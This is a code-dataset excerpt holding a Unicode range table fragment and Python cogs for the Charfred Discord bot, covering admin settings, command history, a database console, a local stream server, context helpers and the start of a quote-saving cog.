\\u2500-\\u257f ─━│┃┄┅┆┇┈┉┊
\\u25a0-\\u25a1 ■□
\\u25b2-\\u25b4 ▲△▴
\\u25c6-\\u25c7 ◆◇
\\u25ca-\\u25cb ◊○
\\u25ce-\\u25cf ◎●
\\u2605-\\u2606 ★☆
\\u2609 ☉
\\u2610 ☐
\\u2640 ♀
\\u2642 ♂
\\u2666 ♦
\\u266a-\\u266b ♪♫
\\u2714 ✔
\\u2717 ✗
\\u274f ❏
\\u2751 ❑
\\u279f ➟
\\u27a2 ➢
\\u27a5 ➥
\\u2a7d ⩽
\\u2fd4 ⿔ CJK++
\\u3001-\\u301e CJK punc
\\u3022-\\u3025 〢〣〤〥
\\u3105-\\u3107 ㄅㄆ
\\u310a ㄊ
\\u3111 ㄑ
\\u3113 ㄓ
\\u3116-\\u3117 ㄖㄗ
\\u311a-\\u311b ㄚㄛ
\\u3122 ㄢ
\\u3125 ㄥ
\\u3127-\\u3128 ㄧㄨ
\\u3220-\\u3229 ㈠㈡㈢㈣㈤㈥㈦㈧㈨
\\u32a3 ㊣
\\u338e-\\u338f ㎎㎏
\\u339c-\\u339d ㎜㎝
\\u33a1 ㎡
\\u33a5 ㎥
\\u33d5 ㏕
\\u33d1-\\u33d2 ㏑㏒
\\u359e 㖞
\\u39d1 㧑
\\u41f2 䇲
\\u4341 䍁
\\u4d13 䴓
\\u4d15 䴕
\\u4e00-\\u9fff CJK
\\uacf3 곳 Korean++
\\ucd38 촸 Korean++
\\ue20c-\\ue2ff ???
\\uf900-\\ufaff CJK ++
\\ufb03 ffi
\\ufe30-\\ufe31 ︰︱
\\ufe33 ︳
\\ufe38 ︸
\\ufe3c-\\ufe3d ︼︽
\\ufe3f-\\ufe41 ︿﹀﹁
\\ufe4d-\\ufe4e ﹍﹎
\\ufe55-\\ufe57 ﹕﹖﹗
\\ufe59-\\ufe5c ﹙﹚﹛
\\ufe5f ﹟
\\ufe63 ﹣
\\ufe65-\\ufe66 ﹥﹦
\\ufe6a-\\ufe6b ﹪﹫
\\ufeff arabic ++ # FE70-FEFF
\\uff01 !
\\uff08-\\uff09 ()
\\uff0c ,
\\uff1a :
\\uff1f ?
\\uff61 。
\\uff63 」
\\uff65 ・
\\uff6c ャ
\\uff72 イ
\\uff86 ニ
\\uff89 ノ
\\uffe0-\\uffe1 ¢£
\\uffe3  ̄
\\uffe5 ¥
\\uffed ■
\\ufffc 
"""
``` |
{
"source": "jinkhya/Charfred_Bot",
"score": 2
} |
#### File: Charfred_Bot/admincogs/admin.py
```python
import logging
import datetime
from discord.ext import commands
from utils import Flipbook
log = logging.getLogger(f'charfred.{__name__}')
class Admin(commands.Cog):
def __init__(self, bot):
self.bot = bot
self.cfg = bot.cfg
@commands.command(hidden=True)
@commands.is_owner()
async def cfgreload(self, ctx):
"""Reload cfg.
Useful when you edited botcfg.json
manually.
Will discard all unsaved changes!
"""
log.info('Reloading botcfg.json...')
await self.cfg.load()
log.info('Reloaded!')
await ctx.sendmarkdown('# Locked and reloaded!')
@commands.command(hidden=True)
async def uptime(self, ctx):
"""Returns the current uptime."""
currenttime = datetime.datetime.now()
uptimedelta = currenttime - self.bot.uptime
s = abs(int(uptimedelta.total_seconds()))
d, s = divmod(s, 86400)
h, s = divmod(s, 3600)
m, s = divmod(s, 60)
upstr = f'{d} day(s), {h} hour(s), {m} minute(s) and {s} second(s)'
log.info(f'Up for {upstr}.')
await ctx.sendmarkdown(f'# I have been up for {upstr}!')
@commands.group(invoke_without_command=True)
async def prefix(self, ctx):
"""Bot Prefix commands.
This returns the list of all current prefixes,
if no subcommand was given.
"""
is_owner = await self.bot.is_owner(ctx.author)
if is_owner:
out = []
for guild_id, prefixes in self.cfg['prefix'].items():
guild = self.bot.get_guild(int(guild_id))
out.append(f'# {guild.name}:' if guild else f'# {guild_id}:')
out.extend([f'\t {prefix}' for prefix in prefixes])
elif ctx.guild:
out = self.cfg['prefix'][str(ctx.guild.id)]
else:
out = []
out.extend(['# Bot mentions (always work):',
f'<@{self.bot.user.id}> ', f'<@!{self.bot.user.id}> ',
'> There\'s a space after the mentions which is part of the prefix!'])
out = '\n'.join(out)
await ctx.sendmarkdown(f'# Current prefixes:\n{out}')
@prefix.command(hidden=True)
@commands.is_owner()
async def add(self, ctx, *, prefix: str):
"""Add a new prefix."""
if ctx.guild:
log.info(f'Adding a new prefix: {prefix}')
try:
self.cfg['prefix'][str(ctx.guild.id)].append(prefix)
except KeyError:
self.cfg['prefix'][str(ctx.guild.id)] = [prefix]
await self.cfg.save()
await ctx.sendmarkdown(f'# \'{prefix}\' has been registered!')
else:
await ctx.sendmarkdown('< Cannot save prefixes outside of a guild! >')
@prefix.command(hidden=True)
@commands.is_owner()
async def remove(self, ctx, *, prefix: str):
"""Remove a prefix."""
if ctx.guild:
log.info(f'Removing prefix: {prefix}')
try:
self.cfg['prefix'][str(ctx.guild.id)].remove(prefix)
except KeyError:
await ctx.sendmarkdown('< This guild has no saved prefixes. >')
except ValueError:
await ctx.sendmarkdown('> Prefix unknown.')
else:
await self.cfg.save()
await ctx.sendmarkdown(f'# \'{prefix}\' has been unregistered!')
def _parserole(self, role):
if not role:
return 'Owner only'
else:
return role
@commands.group(invoke_without_command=True, hidden=True, aliases=['perms'])
async def permissions(self, ctx):
"""Permission commands.
This returns a list of all current permission nodes
and their minimum required role, if no subcommand was given.
"""
log.info('Listing permission nodes.')
nodelist = list(self.cfg['nodes'].items())
nodelist.sort()
nodeentries = [f'{k}:\n\t{self._parserole(v)}' for k, v in nodelist]
nodeflip = Flipbook(ctx, nodeentries, entries_per_page=12,
title='Permission Nodes', close_on_exit=True)
await nodeflip.flip()
@permissions.command(hidden=True)
@commands.is_owner()
async def edit(self, ctx, node: str):
"""Edit a permission node."""
if node not in self.cfg['nodes']:
await ctx.sendmarkdown(f'> {node} is not registered!')
return
role, _, timedout = await ctx.promptinput('# Please enter the minimum role required'
f' to use {node} commands.\nEnter "everyone"'
' to have no role restriction.\n'
'Enter "owner_only" to restrict to bot owner.')
if timedout:
return
if role == 'owner_only':
self.cfg['nodes'][node] = None
else:
if role == 'everyone' or role == 'Everyone':
role = '@everyone'
self.cfg['nodes'][node] = role
await self.cfg.save()
log.info(f'{node} was edited.')
await ctx.sendmarkdown(f'# Edits to {node} saved successfully!')
@permissions.group(invoke_without_command=True, hidden=True)
async def hierarchy(self, ctx):
"""Role hierarchy commands.
This returns a list of all roles currently in the hierarchy,
if no subcommand was given.
Please note that the order within the hierarchy as listed here
does not matter, in essence this hierarchy only sets which roles
to take into consideration when checking for command permissions.
That way you can have lower ranking members with special roles,
that put them above higher ranking members in the guilds role
hierarchy, but not have them inherit said higher ranking members
command permissions, by just not adding that special role to this
hierarchy.
"""
log.info('Listing role hierarchy.')
if not self.cfg['hierarchy']:
await ctx.sendmarkdown('< No hierarchy set up! >')
else:
hierarchy = '\n'.join(self.cfg['hierarchy'])
await ctx.sendmarkdown(f'# Role hierarchy:\n{hierarchy}')
@hierarchy.command(hidden=True, name='add')
@commands.is_owner()
async def addtohierarchy(self, ctx, role):
"""Adds a role to the hierarchy."""
if role in self.cfg['hierarchy']:
await ctx.sendmarkdown(f'> {role} is already in the hierarchy.')
else:
log.info(f'Adding {role} to hierarchy.')
self.cfg['hierarchy'].append(role)
await self.cfg.save()
await ctx.sendmarkdown(f'# {role} added to hierarchy.')
@hierarchy.command(hidden=True, name='remove')
@commands.is_owner()
async def removefromhierarchy(self, ctx, role):
"""Removes a role from the hierarchy."""
if role not in self.cfg['hierarchy']:
await ctx.sendmarkdown(f'> {role} was not in hierarchy.')
else:
log.info(f'Removing {role} from hierarchy.')
self.cfg['hierarchy'].remove(role)
await self.cfg.save()
await ctx.sendmarkdown(f'# {role} removed from hierarchy.')
@commands.group(invoke_without_command=True, hidden=True, aliases=['cogcfgs'])
@commands.is_owner()
async def cogcfg(self, ctx):
"""Cog-specific configuration commands.
This returns a list of all currently known cog-specific
configurations and their current values, if no subcommand was given.
"""
log.info('Listing cog specific configurations.')
cogcfgs = list(self.cfg['cogcfgs'].items())
cogcfgs.sort()
cogcfgentries = [f'{k}:\n\t{v[0]}' for k, v in cogcfgs]
cogcfgflip = Flipbook(ctx, cogcfgentries, entries_per_page=12,
title='Cog-specific Configurations')
await cogcfgflip.flip()
@cogcfg.command(hidden=True, name='edit')
@commands.is_owner()
async def cogcfgedit(self, ctx, cfg: str):
"""Edit cog-specific configuration."""
if cfg not in self.cfg['cogcfgs']:
await ctx.sendmarkdown(f'> {cfg} is not registered!')
return
prompt = self.cfg['cogcfgs'][cfg][1]
value, _, timedout = await ctx.promptinput(prompt)
if timedout:
return
self.cfg['cogcfgs'][cfg] = (value, prompt)
await self.cfg.save()
log.info(f'{cfg} was edited.')
await ctx.sendmarkdown(f'# Edits to {cfg} saved successfully!')
@commands.command(hidden=True)
@commands.is_owner()
async def debughook(self, ctx, hookurl: str=None):
"""Returns and/or changes webhook url used for debugging purposes."""
if 'hook' in self.cfg and self.cfg['hook'] is not None:
await ctx.sendmarkdown(f'> Current debug webhook:\n> {self.cfg["hook"]}')
if hookurl:
self.cfg['hook'] = hookurl
await self.cfg.save()
log.info('Changed debug webhook url.')
await ctx.sendmarkdown(f'> Set debug webhook to:\n> {hookurl}')
def setup(bot):
bot.add_cog(Admin(bot))
```
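The prefix commands above keep per-guild prefixes in cfg['prefix'] keyed by str(guild.id), with bot mentions always accepted. As a rough sketch (not the bot's actual startup code), such a config could back discord.py's callable command_prefix; the cfg object and its layout here are assumptions taken from the cog above:
```python
# Sketch only: assumes a dict-like `cfg` shaped like the Admin cog above,
# i.e. cfg['prefix'] maps str(guild.id) -> list of prefix strings.
from discord.ext import commands

def prefix_getter(cfg):
    def get_prefix(bot, message):
        prefixes = []
        if message.guild:
            # Per-guild prefixes saved by the 'prefix add' command.
            prefixes = cfg.get('prefix', {}).get(str(message.guild.id), [])
        # Mentions always work, matching the cog's prefix listing.
        return commands.when_mentioned_or(*prefixes)(bot, message)
    return get_prefix

# bot = commands.Bot(command_prefix=prefix_getter(cfg))  # hypothetical wiring
```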
#### File: Charfred_Bot/admincogs/commandhistorian.py
```python
import logging
import pprint
import asyncio
import discord
from copy import copy
from collections import namedtuple
from discord.errors import Forbidden, NotFound
from discord.ext import commands
from utils import SizedDict
log = logging.getLogger(f'charfred.{__name__}')
Command = namedtuple('Command', 'msg output')
class CommandHistorian(commands.Cog):
def __init__(self, bot):
self.bot = bot
self.botCfg = bot.cfg
self.loop = bot.loop
self.lock = asyncio.Lock()
self.pprinter = pprint.PrettyPrinter()
self.logcmds = False  # default off; toggled via the cmdlogging commands below
if not hasattr(bot, 'cmd_map'):
self.cmd_map = SizedDict()
bot.cmd_map = self.cmd_map
else:
self.cmd_map = bot.cmd_map
@commands.Cog.listener()
async def on_command(self, ctx):
"""Saves message attached to command context to the command map,
and optionally logs command to users command history file.
"""
self.cmd_map[ctx.message.id] = Command(
msg=ctx.message,
output=[]
)
@commands.Cog.listener()
async def on_message_delete(self, message):
"""Deletes command output if original invokation
message is deleted.
Will only work if the command is still in the
cmd_map and hasn\'t expired yet!
"""
if message.id in self.cmd_map:
log.info('Deleting previous command output!')
try:
await message.channel.delete_messages(self.cmd_map[message.id].output)
except KeyError:
log.error('Deletion of previous command output failed!')
except Forbidden:
log.error('No Permission!')
except NotFound:
log.warning('Some messages not found for deletion!')
else:
del self.cmd_map[message.id]
@commands.Cog.listener()
async def on_message_edit(self, before, after):
"""Reinvokes a command if it has been edited,
and deletes previous command output.
Will only work if the command is still in the
cmd_map and hasn\'t expired yet!
"""
if before.content == after.content:
return
if before.id in self.cmd_map:
log.info('Deleting previous command output!')
try:
await before.channel.delete_messages(self.cmd_map[before.id].output)
except KeyError:
log.error('Deletion of previous command output failed!')
except Forbidden:
log.error('No Permission!')
except NotFound:
log.warning('Some messages not found for deletion!')
else:
log.info(f'Reinvoking: {before.content} -> {after.content}')
del self.cmd_map[before.id]
await self.bot.on_message(after)
def _removefrommap(self, ctx):
log.info('Command removed from command map!')
try:
del self.cmd_map[ctx.message.id]
except KeyError:
pass
@commands.Cog.listener()
async def on_command_error(self, ctx, error):
if isinstance(error, commands.NotOwner):
self._removefrommap(ctx)
elif isinstance(error, commands.CheckFailure):
self._removefrommap(ctx)
elif isinstance(error, commands.MissingPermissions):
self._removefrommap(ctx)
elif isinstance(error, commands.CommandNotFound):
if ctx.message.id not in self.cmd_map:
self.cmd_map[ctx.message.id] = Command(
msg=ctx.message,
output=[]
)
@commands.command(aliases=['!!'])
async def last(self, ctx):
"""Reinvokes the last command executed by the user.
Specifically the last command invoked in the channel that 'last'
was invoked in.
"""
lastcmd = self.cmd_map.find(lambda cmd: (cmd.msg.channel.id == ctx.channel.id) and
(cmd.msg.author.id == ctx.author.id))
if lastcmd:
log.info('Last command found, reinvoking...')
await self.bot.on_message(lastcmd.msg)
else:
log.info('No last command found!')
await ctx.sendmarkdown('> No recent command found in current channel!')
async def rejig_ctx(self, ctx, content=None, author=None, channel=None):
"""Create a copy of a Context with some variables changed."""
copiedmsg = copy(ctx.message)
if content:
copiedmsg.content = content
if author:
copiedmsg.author = author
if channel:
copiedmsg.channel = channel
return await ctx.bot.get_context(copiedmsg)
@commands.command(hidden=True)
@commands.is_owner()
async def su(self, ctx, user: discord.User, *, cmd: str):
"""Substitute user, like the unix command!"""
try:
user = ctx.guild.get_member(user.id) or user
except AttributeError:
pass
rectx = await self.rejig_ctx(ctx, content=f'{ctx.prefix}{cmd}', author=user)
if rectx.command:
await rectx.command.invoke(rectx)
else:
await ctx.sendmarkdown(f'No valid command for "{rectx.invoked_with}" found!')
@commands.command(hidden=True)
@commands.is_owner()
async def cast(self, ctx, channel: discord.TextChannel, *, cmd: str):
"""Cast a command to another channel."""
rectx = await self.rejig_ctx(ctx, content=f'{ctx.prefix}{cmd}', channel=channel)
if rectx.command:
await rectx.command.invoke(rectx)
else:
await ctx.sendmarkdown(f'No valid command for "{rectx.invoked_with}" found!')
@commands.group(hidden=True, invoke_without_command=True)
@commands.is_owner()
async def cmdlogging(self, ctx):
"""Command logging commands.
Returns whether logging is currently enabled or not,
if no subcommand is given.
"""
log.info('Logging is currently ' + ('active!' if self.logcmds else 'inactive!'))
await ctx.sendmarkdown('# Logging is currently ' + ('active!' if self.logcmds else 'inactive!'))
@cmdlogging.command(hidden=True)
@commands.is_owner()
async def toggle(self, ctx):
"""Toggles command logging on and off."""
if self.logcmds:
self.logcmds = False
else:
self.logcmds = True
log.info('Toggled command logging ' + ('on!' if self.logcmds else 'off!'))
await ctx.sendmarkdown('# Toggled command logging ' + ('on!' if self.logcmds else 'off!'))
@commands.group(invoke_without_command=True, hidden=True)
@commands.is_owner()
async def cmdmap(self, ctx):
"""Command Map commands.
This returns a crude list of the current command map state,
if no subcommand was given.
"""
log.info('Showing cmd_map.')
rep = self.pprinter.pformat(self.cmd_map)
await ctx.sendmarkdown(rep)
@cmdmap.command(hidden=True)
@commands.is_owner()
async def clear(self, ctx, max_size: int=100):
"""Clears the current command map.
Optionally takes a number for the maximum
size of the command map.
"""
if max_size > 1:
log.info(f'Clearing cmd_map, setting maximum size to: {max_size}.')
self.cmd_map.clear()
self.cmd_map.max_size = max_size
await ctx.sendmarkdown('Command map cleared, new maximum size set '
f'to {max_size}!')
else:
log.warning('cmd_map clear with insufficient max_size!')
await ctx.sendmarkdown('< Insufficient maximum size, you can\'t '
'even store a single command in there! >')
def setup(bot):
bot.add_cog(CommandHistorian(bot))
```
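The historian relies on a SizedDict from the bot's utils, which is not shown in this snippet; from its usage here it needs dict access, a max_size cap, and a find() that returns the newest matching entry. A hypothetical stand-in might look like the sketch below (the real implementation may differ):
```python
# Hypothetical stand-in for utils.SizedDict, inferred from how the cog uses it.
from collections import OrderedDict

class SizedDict(OrderedDict):
    def __init__(self, max_size=100):
        super().__init__()
        self.max_size = max_size

    def __setitem__(self, key, value):
        super().__setitem__(key, value)
        while len(self) > self.max_size:
            # Drop the oldest entry once the cap is exceeded.
            self.popitem(last=False)

    def find(self, predicate):
        # Return the newest value matching the predicate, or None.
        for key in reversed(self):
            if predicate(self[key]):
                return self[key]
        return None
```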
#### File: Charfred_Bot/utilitycogs/dboperator.py
```python
import logging
from asyncio import wait_for, TimeoutError
from discord.ext import commands
log = logging.getLogger(f'charfred.{__name__}')
class DBOperator(commands.Cog):
def __init__(self, bot):
self.bot = bot
self.loop = bot.loop
self.cfg = bot.cfg
self.db = None
self.queryresult = None
if self.cfg['dbcredentials']:
self.loop.create_task(self._connect())
async def _connect(self):
log.info('Creating database connection pool.')
self.bot.db = self.db = await asyncpg.create_pool(**self.cfg['dbcredentials'])
await self._createtables()
async def _disconnect(self):
log.info('Closing database connection pool...')
try:
await wait_for(self.db.close(), 60, loop=self.loop)
except TimeoutError:
log.critical('Database connection pool closing timed out!')
else:
log.info('Database connection pool closed.')
async def _createtables(self):
async with self.db.acquire() as con:
for (cog, tablecmd) in self.cfg['dbtables']:
await con.execute(tablecmd)
log.info(f'Created table for {cog} using: {tablecmd}')
def cog_unload(self):
if self.db:
self.loop.create_task(self._disconnect())
@commands.group(invoke_without_command=True, hidden=True,
aliases=['db', 'datbase'])
@commands.is_owner()
async def database(self, ctx):
"""Database admin commands.
This returns whether or not a database connection pool
exists, if no subcommand was given.
It is not a guarantee for the pool being usable.
"""
if self.db:
await ctx.sendmarkdown('> Connection pool available.')
else:
await ctx.sendmarkdown('> No connection pool available.')
@database.command(hidden=True)
@commands.is_owner()
async def connect(self, ctx):
"""Creates a connection pool and creates tables.
Make sure database credentials are saved in the bot
configs first. You can use the 'database credentials'
group of commands for this.
"""
if self.db:
await ctx.sendmarkdown('> Connection pool already established!')
else:
await self._connect()
await ctx.sendmarkdown('# Connection pool established, '
'pre-configured tables created.')
@database.command(hidden=True)
@commands.is_owner()
async def execute(self, ctx, command, *args):
"""Runs a given sql command,
use query instead if you want to fetch data.
A variable number of arguments can be given via $n notation.
"""
async with self.db.acquire() as con:
if args:
stat = await con.execute(command, *args)
else:
stat = await con.execute(command)
log.info(stat)
await ctx.sendmarkdown(stat)
@database.command(hidden=True)
@commands.is_owner()
async def query(self, ctx, query, *args):
"""Runs a given sql query and caches returned Record list,
use execute instead if you do not want to fetch any data.
Cached Record list can be accessed with the `record read`
subcommand.
"""
async with self.db.acquire() as con:
if args:
rec = await con.fetch(query, *args)
else:
rec = await con.fetch(query)
self.queryresult = rec
log.info(f'# Query cached with {len(rec)} rows!')
await ctx.sendmarkdown(f'# Query cached with {len(rec)} rows!')
@database.group(invoke_without_command=False, hidden=True)
@commands.is_owner()
async def record(self, ctx):
pass
@record.command(hidden=True)
@commands.is_owner()
async def read(self, ctx):
"""TODO
"""
pass
@database.group(invoke_without_command=True, hidden=True)
@commands.is_owner()
async def credentials(self, ctx):
"""Database credentials commands.
Returns the currently saved credentials,
if no subcommand is given.
"""
out = []
for k, v in self.cfg['dbcredentials'].items():
out.append(f'{k}: {v}')
if out:
out.insert(0, '# Saved credentials:\n\n')
log.info('\n'.join(out))
await ctx.sendmarkdown('\n'.join(out))
else:
log.info('< No credentials saved! >')
await ctx.sendmarkdown('< No credentials saved! >')
@credentials.command(hidden=True)
@commands.is_owner()
async def set(self, ctx, *args):
"""Save given credentials to bot config.
"""
creds = ['database', 'host', 'port', 'user', 'password']
self.cfg['dbcredentials'] = {}
for (k, v) in zip(creds, args):
self.cfg['dbcredentials'][k] = v
await self.cfg.save()
log.info('Credentials saved!')
await ctx.sendmarkdown('> Credentials saved, '
'hope you entered them correctly!')
try:
import asyncpg
except ImportError:
log.error('Could not import asyncpg, dboperator not loaded!')
def setup(bot):
pass
else:
def setup(bot):
if 'dbcredentials' not in bot.cfg:
bot.cfg['dbcredentials'] = {}
bot.cfg._save()
if 'dbtables' not in bot.cfg:
bot.cfg['dbtables'] = {}
bot.cfg._save()
bot.add_cog(DBOperator(bot))
```
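The execute and query commands above hand their extra arguments straight to asyncpg, which substitutes them into PostgreSQL-style positional $n placeholders. A standalone sketch of that call pattern follows; the table, columns and credentials are made up for illustration:
```python
# Illustration of asyncpg's $n placeholder style used by the cog's
# 'db execute' and 'db query' commands. Table and column names are hypothetical.
import asyncio
import asyncpg

async def demo(credentials):
    pool = await asyncpg.create_pool(**credentials)
    async with pool.acquire() as con:
        await con.execute(
            'INSERT INTO quotes (author, quote) VALUES ($1, $2)',
            'Charfred', 'Locked and reloaded!'
        )
        rows = await con.fetch('SELECT quote FROM quotes WHERE author = $1', 'Charfred')
        print([r['quote'] for r in rows])
    await pool.close()

# asyncio.run(demo({'database': 'charfred', 'user': 'charfred', 'password': '...'}))
```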
#### File: Charfred_Bot/utilitycogs/streamserver.py
```python
import logging
import asyncio
from json import loads, JSONDecodeError
from discord.ext import commands
from utils import permission_node
log = logging.getLogger(f'charfred.{__name__}')
class StreamServer(commands.Cog):
def __init__(self, bot):
self.bot = bot
self.loop = bot.loop
self.server = None
self.cfg = bot.cfg
self.handlers = {}
self.loop.create_task(self._start_server())
@property
def running(self) -> bool:
"""Status property, indicating whether the
stream server is running or not.
Returns
-------
bool
True when server is available and serving.
"""
if self.server and self.server.is_serving():
return True
else:
return False
def cog_unload(self):
if self.server:
log.info('Closing server.')
self.server.close()
self.loop.create_task(self.server.wait_closed())
async def _start_server(self):
if self.running:
log.info('Server already running!')
else:
try:
port = self.cfg['streamserverport']
except KeyError:
log.warning('No port configured!')
return
self.server = await asyncio.start_server(
self._connection_handler,
'127.0.0.1',
port,
loop=self.loop
)
log.info('Server started.')
def _close_server(self, wait=True):
if self.server:
log.info('Closing server.')
self.server.close()
if wait:
self.loop.create_task(self.server.wait_closed())
async def _connection_handler(self, reader, writer):
"""Handles the initial handshake upon recieving a new connection,
and checks if a handler is registered for recieving said handshake.
If a handler is found, reader and writer are handed off to it,
if not the connection is dropped.
The handler recieving reader and writer is responsible for when
the connection is closed, outside of the server itself closing.
"""
peer = str(writer.get_extra_info('peername'))
log.info(f'New connection established with {peer}.')
handshake = await reader.readline()
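# Expected first line: a newline-terminated JSON object such as {"type": "handshake", "handler": "<name>"}.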
if not handshake:
log.warning(f'No handshake received from {peer},'
' dropping connection.')
writer.close()
return
try:
handshake = loads(handshake)
is_handshake = handshake['type'] == 'handshake'
except JSONDecodeError:
log.warning(f'Received non-json data from {peer},'
' dropping connection.')
writer.close()
return
except KeyError:
log.warning(f'Malformed handshake received from {peer},'
' dropping connection.')
writer.close()
return
if is_handshake:
try:
handler = handshake['handler']
except KeyError:
log.warning(f'{peer} did not specify a handler,'
' dropping connection.')
writer.close()
return
if handler in self.handlers:
self.loop.create_task(self.handlers[handler](reader, writer, handshake))
else:
log.warning(f'Handler "{handler}" specified by {peer} is unknown,'
' dropping connection.')
writer.close()
return
else:
log.warning(f'Initial data from {peer} was not a handshake,'
' dropping connection.')
writer.close()
return
def register_handler(self, handler: str, func) -> None:
"""Registers a new connection handler.
Parameters
----------
handler : str
name of the handler
func : Callable[[asyncio.StreamReader, asyncio.StreamWriter, str], None]
handler callable
"""
log.info(f'Registering {handler}.')
self.handlers[handler] = func
def unregister_handler(self, handler: str) -> None:
"""Unregister a known connection handler.
Parameters
----------
handler : str
name of the handler
"""
if handler in self.handlers:
log.info(f'Unregistering {handler}.')
del self.handlers[handler]
else:
log.info(f'{handler} is not registered.')
async def _serverstatus(self):
if self.running:
return '# Stream Server is up.'
else:
return '< Stream server is down! >'
@commands.group(invoke_without_command=True)
@permission_node(f'{__name__}')
async def streamserver(self, ctx):
"""Stream server commands.
Returns whether or not the server is up.
"""
msg = await self._serverstatus()
await ctx.sendmarkdown(msg)
@streamserver.command()
@permission_node(f'{__name__}')
async def start(self, ctx):
"""Start the stream server."""
await self._start_server()
msg = await self._serverstatus()
await ctx.sendmarkdown(msg)
@streamserver.command()
@permission_node(f'{__name__}')
async def stop(self, ctx):
"""Stop the stream server."""
self._close_server(wait=False)
await self.server.wait_closed()
msg = await self._serverstatus()
await ctx.sendmarkdown(msg)
@streamserver.command()
@permission_node(f'{__name__}.setport')
async def setport(self, ctx, port: int):
"""Set the port the stream server should listen on."""
self.cfg['streamserverport'] = port
await self.cfg.save()
await ctx.sendmarkdown('# Port saved!')
@streamserver.command()
@permission_node(f'{__name__}.disable')
async def disable(self, ctx):
"""Disable the stream server by stopping it and removing
the configured port, preventing the server from
launching again.
Useful in case you want to unload the cog and not have the
server start up when you load it up again.
"""
self._close_server(wait=False)
del self.cfg['streamserverport']
await self.cfg.save()
await self.server.wait_closed()
await ctx.sendmarkdown('# Stream server disabled, port removed '
'from config!')
def setup(bot):
permission_nodes = ['', 'setport', 'disable']
bot.register_nodes([f'{__name__}.{node}' if node else f'{__name__}'
for node in permission_nodes])
bot.add_cog(StreamServer(bot))
```
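A client of this stream server is expected to open a TCP connection and send a single newline-terminated JSON handshake naming a registered handler, as parsed in _connection_handler above. A minimal client sketch (port and handler name are placeholders):
```python
# Minimal client sketch for the handshake expected by _connection_handler.
# 'exampleHandler' must match a handler registered via register_handler.
import asyncio
import json

async def connect_to_charfred(port=12345, handler='exampleHandler'):
    reader, writer = await asyncio.open_connection('127.0.0.1', port)
    handshake = {'type': 'handshake', 'handler': handler}
    writer.write((json.dumps(handshake) + '\n').encode())
    await writer.drain()
    # From here on, the registered handler on the bot side owns the connection.
    return reader, writer
```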
#### File: Charfred_Bot/utils/context.py
```python
import re
from asyncio import TimeoutError
from discord.ext import commands
from utils import splitup
class CharfredContext(commands.Context):
def prompt_check(self, msg):
return msg.author.id == self.author.id and msg.channel.id == self.channel.id
async def send(self, msg=None, deletable=True, embed=None, codeblocked=False, **kwargs):
"""Helper function to send all sorts of things!
Messages are automatically split into multiple messages if they're too long,
and if the codeblocked parameter is True codeblock formatting is
preserved when such a split occurs.
Returns the message object for the sent message,
if a split was performed only the last sent message is returned.
"""
if (msg is None) or (len(msg) <= 2000):
outmsg = await super().send(content=msg, embed=embed, **kwargs)
if deletable:
try:
self.bot.cmd_map[self.message.id].output.append(outmsg)
except KeyError:
pass
except AttributeError:
pass
return outmsg
else:
msgs = splitup(msg, codeblocked)
for msg in msgs:
outmsg = await self.send(msg, deletable, codeblocked=codeblocked)
return outmsg
async def sendmarkdown(self, msg, deletable=True):
"""Helper function that wraps a given message in markdown codeblocks
and sends if off.
Because laziness is the key to great success!
"""
return await self.send(f'```markdown\n{msg}\n```', deletable=deletable, codeblocked=True)
async def promptinput(self, prompt: str, timeout: int=120, deletable=True):
"""Prompt for text input.
Returns a tuple of acquired input,
reply message, and boolean indicating prompt timeout.
"""
await self.sendmarkdown(prompt, deletable)
try:
r = await self.bot.wait_for('message', check=self.prompt_check, timeout=timeout)
except TimeoutError:
await self.sendmarkdown('> Prompt timed out!', deletable)
return (None, None, True)
else:
return (r.content, r, False)
async def promptconfirm(self, prompt: str, timeout: int=120, deletable=True):
"""Prompt for confirmation.
Returns a triple of acquired confirmation,
reply message, and boolean indicating prompt timeout.
"""
await self.sendmarkdown(prompt, deletable)
try:
r = await self.bot.wait_for('message', check=self.prompt_check, timeout=timeout)
except TimeoutError:
await self.sendmarkdown('> Prompt timed out!', deletable)
return (None, None, True)
else:
if re.match('^(y|yes)', r.content, flags=re.I):
return (True, r, False)
else:
return (False, r, False)
async def promptconfirm_or_input(self, prompt: str, timeout: int=120,
deletable=True, confirm=True):
"""Prompt for confirmation or input at the same time.
Instead of 'yes/no' this lets your prompt for 'yes/input' or 'no/input',
depending on the 'confirm' kwarg.
Returns a 3 tuple of input, reply message object
and boolean indicating prompt timeout.
'input' will be None, if 'yes' for confirm=True (the default),
or 'no' for confirm=False.
"""
await self.sendmarkdown(prompt, deletable)
try:
r = await self.bot.wait_for('message', check=self.prompt_check, timeout=timeout)
except TimeoutError:
await self.sendmarkdown('> Prompt timed out!', deletable)
return (None, None, True)
else:
if confirm:
pat = '^(y|yes)'
else:
pat = '^(n|no)'
if re.match(pat, r.content, flags=re.I):
return (None, r, False)
else:
return (r.content, r, False)
``` |
{
"source": "jinkhya/Charfred_Cogs",
"score": 3
} |
#### File: Charfred_Cogs/datacogs/quote.py
```python
import logging
import discord
from random import randrange
from discord.ext import commands
from utils import Config, Flipbook, permission_node
log = logging.getLogger('charfred')
class Quotator(commands.Cog):
def __init__(self, bot):
self.bot = bot
self.loop = bot.loop
self.quotes = Config(f'{bot.dir}/data/quotes.json',
load=True, loop=self.loop)
@commands.Cog.listener()
async def on_reaction_add(self, reaction, user):
if str(reaction.emoji) == '💾' and reaction.count == 1:
if user.bot or reaction.message.author.bot:
return
log.info('Saving a quote!')
quotee = reaction.message.author
if reaction.message.attachments:
urls = []
for a in reaction.message.attachments:
urls.append(a.url)
urls = '\n'.join(urls)
quote = f'{reaction.message.content}\n{urls}'
else:
quote = reaction.message.content
if not quote:
await reaction.message.add_reaction('🖕')
return
id = str(quotee.id)
if id not in self.quotes:
self.quotes[id] = []
self.quotes[id].append({'quote': quote,
'savedBy': user.id})
await self.quotes.save()
await reaction.message.add_reaction('👌')
@commands.group(invoke_without_command=True)
@permission_node(f'{__name__}.quote')
async def quote(self, ctx, member: discord.Member=None, _index: int=None):
"""User Quote commands.
This returns a list of all users that are registered in the
quote repository, if no subcommand was given.
"""
if member and str(member.id) in self.quotes:
id = str(member.id)
if _index is None:
log.info('Random quote!')
_index = randrange(len(self.quotes[id]))
q = self.quotes[id][_index]['quote']
else:
try:
log.info('Specific quote!')
q = self.quotes[id][_index]['quote']
except (KeyError, IndexError):
log.info('No quote with that index!')
await ctx.send('Sorry sir, there is no quote under that number!')
return
if member.nick:
name = member.nick
else:
name = member.name
await ctx.send(f'{q}\n\n_{name}; Quote #{_index}_')
else:
converter = commands.MemberConverter()
async def getName(id):
try:
member = await converter.convert(ctx, id)
except commands.errors.BadArgument:
